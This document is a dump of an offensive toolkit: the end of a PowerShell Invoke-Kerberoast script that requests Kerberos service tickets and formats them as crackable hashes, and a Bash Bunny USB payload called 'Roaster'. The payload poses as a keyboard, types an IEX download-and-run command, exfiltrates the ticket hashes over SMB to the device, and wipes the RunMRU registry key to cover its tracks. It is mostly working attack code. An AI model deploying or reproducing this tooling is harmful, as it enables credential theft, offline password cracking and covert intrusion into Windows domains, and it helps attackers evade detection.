$Credential.GetNetworkCredential().Password) 223 | $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) 224 | } 225 | else { 226 | $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) 227 | } 228 | 229 | $Searcher.PageSize = $ResultPageSize 230 | 
$Searcher.SearchScope = $SearchScope 231 | $Searcher.CacheResults = $False 232 | 233 | if ($Tombstone) { 234 | $Searcher.Tombstone = $True 235 | } 236 | 237 | if ($LDAPFilter) { 238 | $Searcher.filter = $LDAPFilter 239 | } 240 | 241 | if ($SecurityMasks) { 242 | $Searcher.SecurityMasks = Switch ($SecurityMasks) { 243 | 'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl } 244 | 'Group' { [System.DirectoryServices.SecurityMasks]::Group } 245 | 'None' { [System.DirectoryServices.SecurityMasks]::None } 246 | 'Owner' { [System.DirectoryServices.SecurityMasks]::Owner } 247 | 'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl } 248 | } 249 | } 250 | 251 | if ($Properties) { 252 | # handle an array of properties to load w/ the possibility of comma-separated strings 253 | $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') } 254 | $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad)) 255 | } 256 | 257 | $Searcher 258 | } 259 | } 260 | 261 | 262 | function Convert-LDAPProperty { 263 | <# 264 | .SYNOPSIS 265 | 266 | Helper that converts specific LDAP property result fields and outputs 267 | a custom psobject. 268 | 269 | Author: Will Schroeder (@harmj0y) 270 | License: BSD 3-Clause 271 | Required Dependencies: None 272 | 273 | .DESCRIPTION 274 | 275 | Converts a set of raw LDAP properties results from ADSI/LDAP searches 276 | into a proper PSObject. Used by several of the Get-Net* function. 277 | 278 | .PARAMETER Properties 279 | 280 | Properties object to extract out LDAP fields for display. 281 | 282 | .OUTPUTS 283 | 284 | System.Management.Automation.PSCustomObject 285 | 286 | A custom PSObject with LDAP hashtable properties translated. 
287 | #> 288 | 289 | [OutputType('System.Management.Automation.PSCustomObject')] 290 | [CmdletBinding()] 291 | Param( 292 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 293 | [ValidateNotNullOrEmpty()] 294 | $Properties 295 | ) 296 | 297 | $ObjectProperties = @{} 298 | 299 | $Properties.PropertyNames | ForEach-Object { 300 | if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) { 301 | # convert the SID to a string 302 | $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0], 0)).Value 303 | } 304 | elseif ($_ -eq 'objectguid') { 305 | # convert the GUID to a string 306 | $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid 307 | } 308 | elseif ($_ -eq 'ntsecuritydescriptor') { 309 | $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0 310 | } 311 | elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) { 312 | # convert timestamps 313 | if ($Properties[$_][0] -is [System.MarshalByRefObject]) { 314 | # if we have a System.__ComObject 315 | $Temp = $Properties[$_][0] 316 | [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 317 | [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 318 | $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) 319 | } 320 | else { 321 | # otherwise just a string 322 | $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) 323 | } 324 | } 325 | elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) { 326 | # try to convert misc com objects 327 | $Prop = $Properties[$_] 328 | try { 329 | $Temp = $Prop[$_][0] 330 | Write-Verbose $_ 331 | [Int32]$High = $Temp.GetType().InvokeMember('HighPart', 
[System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 332 | [Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) 333 | $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) 334 | } 335 | catch { 336 | $ObjectProperties[$_] = $Prop[$_] 337 | } 338 | } 339 | elseif ($Properties[$_].count -eq 1) { 340 | $ObjectProperties[$_] = $Properties[$_][0] 341 | } 342 | else { 343 | $ObjectProperties[$_] = $Properties[$_] 344 | } 345 | } 346 | 347 | New-Object -TypeName PSObject -Property $ObjectProperties 348 | } 349 | 350 | 351 | function Get-NetDomain { 352 | <# 353 | .SYNOPSIS 354 | 355 | Returns a given domain object. 356 | 357 | Author: Will Schroeder (@harmj0y) 358 | License: BSD 3-Clause 359 | Required Dependencies: None 360 | 361 | .DESCRIPTION 362 | 363 | Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current 364 | domain or the domain specified with -Domain X. 365 | 366 | .PARAMETER Domain 367 | 368 | Specifies the domain name to query for, defaults to the current domain. 369 | 370 | .PARAMETER Credential 371 | 372 | A [Management.Automation.PSCredential] object of alternate credentials 373 | for connection to the target domain. 
374 | 375 | .EXAMPLE 376 | 377 | Get-NetDomain -Domain testlab.local 378 | 379 | .OUTPUTS 380 | 381 | System.DirectoryServices.ActiveDirectory.Domain 382 | 383 | .LINK 384 | 385 | http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG 386 | #> 387 | 388 | [OutputType('System.DirectoryServices.ActiveDirectory.Domain')] 389 | [CmdletBinding()] 390 | Param( 391 | [Parameter(Position = 0, ValueFromPipeline = $True)] 392 | [ValidateNotNullOrEmpty()] 393 | [String] 394 | $Domain, 395 | 396 | [Management.Automation.PSCredential] 397 | [Management.Automation.CredentialAttribute()] 398 | $Credential = [Management.Automation.PSCredential]::Empty 399 | ) 400 | 401 | PROCESS { 402 | if ($Credential -ne [Management.Automation.PSCredential]::Empty) { 403 | 404 | Write-Verbose "Using alternate credentials for Get-NetDomain" 405 | 406 | if (-not $Domain) { 407 | # if no domain is supplied, extract the logon domain from the PSCredential passed 408 | $TargetDomain = $Credential.GetNetworkCredential().Domain 409 | Write-Verbose "Extracted domain '$Domain' from -Credential" 410 | } 411 | else { 412 | $TargetDomain = $Domain 413 | } 414 | 415 | $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password) 416 | 417 | try { 418 | [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) 419 | } 420 | catch { 421 | Write-Verbose "The specified domain does '$TargetDomain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid." 
# --- tail of Get-NetDomain (its definition begins above this point) ---
                $Null
            }
        }
        elseif ($Domain) {
            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
            try {
                [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
            }
            catch {
                Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust."
                $Null
            }
        }
        else {
            # No -Domain and no -Credential: fall back to the domain of the current context.
            [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
        }
    }
}


function Get-SPNTicket {
<#
.SYNOPSIS

Request the kerberos ticket for a specified service principal name (SPN).

Author: @machosec, Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None

.DESCRIPTION

This function will either take one/more SPN strings, or one/more PowerView.User objects
(the output from Get-NetUser) and will request a kerberos ticket for the given SPN
using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
portion of the ticket is then extracted and output in either crackable John or Hashcat
format (default of John).

.PARAMETER SPN

Specifies the service principal name to request the ticket for.
Must contain a '/' (enforced by ValidatePattern).

.PARAMETER User

Specifies a PowerView.User object (result of Get-NetUser) to request the ticket for.
The object's first type name must be 'PowerView.User' (enforced by ValidateScript).

.PARAMETER OutputFormat

Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
Defaults to 'John'.

.EXAMPLE

Get-SPNTicket -SPN "HTTP/web.testlab.local"

Request a kerberos service ticket for the specified SPN.

.EXAMPLE

"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-SPNTicket

Request kerberos service tickets for all SPNs passed on the pipeline.

.EXAMPLE

Get-NetUser -SPN | Get-SPNTicket -OutputFormat Hashcat

Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.

.INPUTS

String

Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.

.INPUTS

PowerView.User

Accepts one or more PowerView.User objects on the pipeline with the User parameter set.

.OUTPUTS

PowerView.SPNTicket

Outputs a custom object containing the SamAccountName, DistinguishedName, ServicePrincipalName, and encrypted ticket section.
SamAccountName and DistinguishedName are $Null when a raw SPN string was supplied.
#>

[OutputType('PowerView.SPNTicket')]
[CmdletBinding(DefaultParameterSetName='RawSPN')]
Param (
    [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]
    [ValidatePattern('.*/.*')]
    [Alias('ServicePrincipalName')]
    [String[]]
    $SPN,

    [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]
    [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]
    [Object[]]
    $User,

    [Parameter(Position = 1)]
    [ValidateSet('John', 'Hashcat')]
    [Alias('Format')]
    [String]
    $OutputFormat = 'John'
)

BEGIN {
    # System.IdentityModel supplies KerberosRequestorSecurityToken, used in PROCESS below.
    $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
}

PROCESS {
    # Pick the input set for this pass: PowerView.User objects or raw SPN strings.
    if ($PSBoundParameters['User']) {
        $TargetObject = $User
    }
    else {
        $TargetObject = $SPN
    }

    ForEach ($Object in $TargetObject) {
        # For user objects, keep the account identity alongside the SPN; raw SPNs carry no identity.
        if ($PSBoundParameters['User']) {
            $UserSPN = $Object.ServicePrincipalName
            $SamAccountName = $Object.SamAccountName
            $DistinguishedName = $Object.DistinguishedName
        }
        else {
            $UserSPN = $Object
            $SamAccountName = $Null
            $DistinguishedName = $Null
        }

        # Requesting the token makes the service ticket request for the SPN; GetRequest() returns the raw bytes.
        $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
        $TicketByteStream = $Ticket.GetRequest()
        if ($TicketByteStream) {
            # Hex-encode the ticket bytes, then carve out the portion between fixed hex markers
            # and drop the trailing segment after the last 'A48201' separator.
            $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
            [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201'
            $Parts.RemoveAt($Parts.Count - 1)
            $Hash = $Parts -join 'A48201'
            # Split the extracted hex after the first 32 characters (16 bytes) with a '$' separator.
            $Hash = $Hash.Insert(32, '$')

            $Out = New-Object PSObject
            $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName
            $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName
            $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName

            if ($OutputFormat -match 'John') {
                $HashFormat = "`$krb5tgs`$unknown:$Hash"
            }
            else {
                # hashcat output format
                # NOTE(review): the DN/SPN inside the '*...*' header is a hard-coded placeholder
                # (fakesvc / fakedomain), not the account's real data. Consumers that need the real
                # identity should read the SamAccountName / DistinguishedName / ServicePrincipalName
                # properties of the output object rather than parsing this header.
                $HashFormat = '$krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Service,OU=Accounts,OU=EnterpriseObjects,DC=asdf,DC=pd,DC=fakedomain,DC=com SPN: F3514235-4C06-11D1-AB04-00D04FC2DCD2-GDCD/asdf.asdf.pd.fakedomain.com:50000 *' + $Hash
            }
            $Out | Add-Member Noteproperty 'Hash' $HashFormat

            $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')

            Write-Output $Out
            # NOTE(review): 'break' leaves the ForEach after the first ticket, so when several SPNs or
            # users are passed as an array argument only the first result is emitted. Pipeline input is
            # unaffected because PROCESS runs once per item — confirm this is intended.
            break
        }
    }
}
}


function Invoke-Kerberoast {
<#
.SYNOPSIS

Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.

Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Get-SPNTicket

.DESCRIPTION

Implements code from Get-NetUser to query for user accounts with non-null service principal
names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
The ticket format can be specified with -OutputFormat

.PARAMETER Identity

A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted. By default all accounts will be queried for non-null SPNs.

.PARAMETER AdminCount

Switch. Return users with adminCount=1.

.PARAMETER Domain

Specifies the domain to use for the query, defaults to the current domain.

.PARAMETER LDAPFilter

Specifies an LDAP query string that is used to filter Active Directory objects.
It is appended verbatim to the generated filter, so it must be a well-formed LDAP filter fragment.

.PARAMETER SearchBase

The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.

.PARAMETER Server

Specifies an Active Directory server (domain controller) to bind to.

.PARAMETER SearchScope

Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

.PARAMETER ResultPageSize

Specifies the PageSize to set for the LDAP searcher object. Valid range 1-10000, default 200.

.PARAMETER Credential

A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.

.PARAMETER OutputFormat

Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
Defaults to 'John'.

.EXAMPLE

Invoke-Kerberoast | fl

SamAccountName : SQLService
DistinguishedName : CN=SQLService,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/PRIMARY.testlab.local:1433
Hash : $krb5tgs$unknown:30FFC786BECD0E88992CBBB017155C53$0343A9C8...

.EXAMPLE

Invoke-Kerberoast -Domain dev.testlab.local | ConvertTo-CSV -NoTypeInformation

"SamAccountName","DistinguishedName","ServicePrincipalName","Hash"
"SQLSVC","CN=SQLSVC,CN=Users,DC=dev,DC=testlab,DC=local","MSSQLSvc/secondary.dev.testlab.local:1433","$krb5tgs$unknown:ECF4BDD1037D1D9E2E091ABBDC92F00E$0F3A4...

.EXAMPLE

Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl

SamAccountName : SQLService
DistinguishedName : CN=SQLService,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/PRIMARY.testlab.local:1433
Hash : $krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Se
rvice,OU=Accounts,OU=EnterpriseObjects,DC=proddfs,DC=pf,
DC=fakedomain,DC=com SPN: H3514235-4C06-12D1-AB04-00D04F
C2DCD2-GDCD/asdf.asdf.pd.fakedomain.com:50000 *30
FFC786BECD0E88992CBBB017155C53$0343A9C8A7EB90F059CD92B52
....

.INPUTS

String

Accepts one or more identity strings on the pipeline (bound to -Identity), or objects
whose SamAccountName / Name property is bound to -Identity by property name.

.OUTPUTS

PowerView.SPNTicket

Outputs a custom object containing the SamAccountName, DistinguishedName, ServicePrincipalName, and encrypted ticket section.
#>

[OutputType('PowerView.SPNTicket')]
[CmdletBinding()]
Param(
    [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
    [Alias('SamAccountName', 'Name')]
    [String[]]
    $Identity,

    [Switch]
    $AdminCount,

    [ValidateNotNullOrEmpty()]
    [String]
    $Domain,

    [ValidateNotNullOrEmpty()]
    [Alias('Filter')]
    [String]
    $LDAPFilter,

    [ValidateNotNullOrEmpty()]
    [String]
    $SearchBase,

    [ValidateNotNullOrEmpty()]
    [String]
    $Server,

    [ValidateSet('Base', 'OneLevel', 'Subtree')]
    [String]
    $SearchScope = 'Subtree',

    [ValidateRange(1,10000)]
    [Int]
    $ResultPageSize = 200,

    [Management.Automation.PSCredential]
    [Management.Automation.CredentialAttribute()]
    $Credential = [Management.Automation.PSCredential]::Empty,

    [ValidateSet('John', 'Hashcat')]
    [Alias('Format')]
    [String]
    $OutputFormat = 'John'
)

BEGIN {
    # Only explicitly bound parameters are forwarded to Get-DomainSearcher, so its own
    # defaults apply for anything the caller did not specify.
    $SearcherArguments = @{}
    if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
    if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
    if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
    if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
    if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
    if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
    $UserSearcher = Get-DomainSearcher @SearcherArguments

    # Same pattern for Get-SPNTicket: -OutputFormat is only passed through when the caller set it.
    $GetSPNTicketArguments = @{}
    if ($PSBoundParameters['OutputFormat']) { $GetSPNTicketArguments['OutputFormat'] = $OutputFormat }

}

PROCESS {
    if ($UserSearcher) {
        $IdentityFilter = ''
        $Filter = ''
        # Classify each identity by its shape (SID, DN, GUID, else SamAccountName) and OR them together.
        # Values are interpolated into the LDAP filter unescaped: that is what lets wildcards through
        # (see .PARAMETER Identity), but it also means any LDAP metacharacters in a value become part
        # of the query.
        $Identity | Where-Object {$_} | ForEach-Object {
            $IdentityInstance = $_
            if ($IdentityInstance -match '^S-1-.*') {
                $IdentityFilter += "(objectsid=$IdentityInstance)"
            }
            elseif ($IdentityInstance -match '^CN=.*') {
                $IdentityFilter += "(distinguishedname=$IdentityInstance)"
            }
            else {
                try {
                    $Null = [System.Guid]::Parse($IdentityInstance)
                    $IdentityFilter += "(objectguid=$IdentityInstance)"
                }
                catch {
                    $IdentityFilter += "(samAccountName=$IdentityInstance)"
                }
            }
        }
        if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
            $Filter += "(|$IdentityFilter)"
        }
        # Always restrict to accounts that have at least one SPN.
        $Filter += '(servicePrincipalName=*)'

        if ($PSBoundParameters['AdminCount']) {
            Write-Verbose 'Searching for adminCount=1'
            $Filter += '(admincount=1)'
        }
        if ($PSBoundParameters['LDAPFilter']) {
            Write-Verbose "Using additional LDAP filter: $LDAPFilter"
            $Filter += "$LDAPFilter"
        }

        # The samAccountType clause narrows the search to user accounts, as described in .DESCRIPTION.
        $UserSearcher.filter = "(&(samAccountType=805306368)$Filter)"
        Write-Verbose "Invoke-Kerberoast search filter string: $($UserSearcher.filter)"

        $Results = $UserSearcher.FindAll()
        # Convert each LDAP result to a PowerView.User (the type Get-SPNTicket's -User set validates),
        # drop krbtgt so no ticket is requested for it, then request/extract the tickets.
        $Results | Where-Object {$_} | ForEach-Object {
            $User = Convert-LDAPProperty -Properties $_.Properties
            $User.PSObject.TypeNames.Insert(0, 'PowerView.User')
            $User
        } | Where-Object {$_.SamAccountName -notmatch 'krbtgt'} | Get-SPNTicket @GetSPNTicketArguments

        # NOTE(review): the searcher created in BEGIN is disposed here, at the end of the first PROCESS
        # pass; a second pipeline item would reach FindAll() on an already-disposed searcher
        # ($UserSearcher is still non-null, so the guard above does not catch it) — confirm whether
        # multi-item pipeline input is supported.
        $Results.dispose()
        $UserSearcher.dispose()
    }
}
}
--------------------------------------------------------------------------------
/Roaster/payload.txt:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Title: Roaster
# Author: golem445
# Version: 1.0
# Dependencies: impacket, gohttp
# Runtime: ~10 seconds
#
# Sets up Ethernet and HID keyboard interfaces
# simultaneously,
# then uses HID to import Invoke-Kerberoast into memory via
# Bash Bunny web server and execute the attack. Results are
# exported to the loot directory via SMB.
#
# LED colours used at each stage are documented in readme.md (STATUS table).

### Prep for attack ###
LED SETUP
# Aborts (Flashing Red per readme.md) if either tool is missing.
REQUIRETOOL impacket gohttp
# Sets $SWITCH_POSITION, used below to locate this payload's directory.
GET SWITCH_POSITION

# Temporary loot directory
mkdir -p /loot/smb/

# Permanent loot directory
mkdir -p /root/udisk/loot/roaster_exfil/

# Set interfaces
ATTACKMODE RNDIS_ETHERNET HID

# Start web server
# Serves this payload's directory over HTTP on port 80 in the background; nothing in this
# payload stops it afterwards.
cd /root/udisk/payloads/$SWITCH_POSITION
gohttp -p 80 &

# Start SMB Server
# Share name 's', backed by /loot/smb; s.ps1 writes output.txt and the EXFILTRATION_COMPLETE
# sentinel here. Also left running in the background.
python /tools/impacket/examples/smbserver.py s /loot/smb &

### Start attack ###
LED ATTACK
RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"

# Wait until files are done copying.
# Blocks until s.ps1 creates the sentinel; there is no timeout, so the payload stays in
# STAGE2 indefinitely if the target never reaches that step.
LED STAGE2
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

### Cleanup ###
LED CLEANUP

# Delete Exfil file
rm /loot/smb/EXFILTRATION_COMPLETE

# Move Kerberos SPNS to permanent loot directory
mv /loot/smb/* /root/udisk/loot/roaster_exfil/

# Clean up temporary loot directory
# Removes anything the mv above left behind.
rm -rf /loot/smb/*

# Sync file system
sync

# Complete
LED FINISH
--------------------------------------------------------------------------------
/Roaster/readme.md:
--------------------------------------------------------------------------------
# Roaster
* Author: golem445
* Version: 1.0
* Target: Windows Domains

## Description

Sets up Ethernet and HID keyboard interfaces simultaneously,
then uses HID to import Invoke-Kerberoast into memory via
Bash Bunny web server and execute the attack. Results are
exported to the loot directory via SMB.

Note: This module will bypass network restrictions on USB
disk drives as only a network card and keyboard are emulated.

## Requirements

Impacket and gohttp should be installed

## STATUS


| Status | Description |
| ------------------- | ---------------------------------------- |
| Flashing Red | Impacket or gohttp not found |
| Solid Violet | Setup for attack |
| Flashing Amber | Attack in progress |
| Flashing Cyan | Cleaning up |
| Solid Green | Attack complete |

## Credits

* Tim Medin for Kerberoast
* Hak5Darren for SMB exfil
--------------------------------------------------------------------------------
/Roaster/s.ps1:
--------------------------------------------------------------------------------
# Roaster stage 2. Fetched over HTTP from the Bash Bunny (172.16.64.1, the address used
# in payload.txt) and run in memory by the one-liner that payload.txt types via HID.
# Loads Invoke-Kerberoast.ps1 from the same web server into the current session.
IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/Invoke-Kerberoast.ps1')
# Writes the Hashcat-formatted results to the 's' share that payload.txt exposes with smbserver.py.
Invoke-Kerberoast -Outputformat Hashcat | fl > \\172.16.64.1\s\output.txt
# Sentinel file that payload.txt polls for before it starts cleanup.
New-Item -Path \\172.16.64.1\s -ItemType "file" -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
# Anti-forensic step: removes every value under the Run-dialog MRU key, presumably to clear the
# entry left by the RUN WIN step in payload.txt; any error is silenced.
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
exit
--------------------------------------------------------------------------------